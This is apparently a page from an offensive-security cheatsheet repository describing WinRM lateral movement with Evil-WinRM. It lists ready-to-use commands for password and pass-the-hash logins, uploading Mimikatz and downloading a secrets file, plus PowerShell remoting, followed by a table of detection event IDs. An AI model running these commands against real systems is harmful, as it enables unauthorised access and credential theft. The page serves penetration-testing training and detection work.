daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-55-winrm-evil-winrm-lateral-movement.md (3033B)


      1 ---
      2 title: "Attack #55 — WinRM Evil-WinRM Lateral Movement"
      3 description: "Windows Remote Management (WinRM) is a SOAP-based protocol for remote management over HTTP/HTTPS (ports 5985/5986). Evil-WinRM provides an interactive…"
      4 category: active-directory
      5 subcategory: "Lateral Movement"
      6 tags: ["active-directory", "lateral-movement"]
      7 tools: ["Mimikatz", "Evil-WinRM", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Seven/⚫ Attack #55 — WinRM Evil-WinRM Lateral Movement.md"
     11 ---
     12 # ⚫ Attack #55 — WinRM / Evil-WinRM Lateral Movement
     13 
     14 ***
     15 
     16 ## 📖 How It Works
     17 
     18 Windows Remote Management (WinRM) is a SOAP-based protocol for remote management over HTTP/HTTPS (ports 5985/5986). Evil-WinRM provides an interactive PowerShell shell over WinRM with built-in file upload/download, DLL loading, and PowerShell script execution capabilities. Users must be in the **Remote Management Users** group or have admin rights.
     19 
     20 ***
     21 
     22 ## ⚙️ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **WinRM enabled on target** | Port 5985 (HTTP) or 5986 (HTTPS) |
     27 | **Admin or Remote Management Users** | Required for WinRM access |
     28 
     29 ***
     30 
     31 ## 💻 Full Commands
     32 
     33 ```bash
     34 # ── Evil-WinRM with password ──────────────────────────────────────────────────
     35 evil-winrm -i 10.10.10.10 -u Administrator -p 'Password1'
     36 
     37 # ── PtH ───────────────────────────────────────────────────────────────────────
     38 evil-winrm -i 10.10.10.10 -u Administrator -H 2b576acbe6bcfda7294d6bd18041b8fe
     39 
     40 # ── With scripts directory ────────────────────────────────────────────────────
     41 evil-winrm -i 10.10.10.10 -u Administrator -p 'Password1' -s /opt/tools/
     42 
     43 # ── Upload/Download inside session ────────────────────────────────────────────
     44 # upload /local/mimikatz.exe C:\Temp\mimikatz.exe
     45 # download C:\Temp\secrets.txt /local/secrets.txt
     46 ```
     47 
     48 ```powershell
     49 # ── Native PowerShell remoting ────────────────────────────────────────────────
     50 Enter-PSSession -ComputerName TARGET -Credential CORP\Administrator
     51 Invoke-Command -ComputerName TARGET -ScriptBlock { whoami } -Credential CORP\Administrator
     52 ```
     53 
     54 ***
     55 
     56 ## 🛡️ Detection — Event IDs
     57 
     58 | Event ID | Source | What to Look For |
     59 |---|---|---|
     60 | **4624** | Security Log | Logon Type 3 via WinRM from unexpected source |
     61 | **91** | Microsoft-Windows-WinRM/Operational | WinRM session created |
     62 | **4688** | Security Log | wsmprovhost.exe spawning cmd/powershell |
     63 
     64 ***
     65 
     66 > ✅ **Attack #55 — WinRM complete.**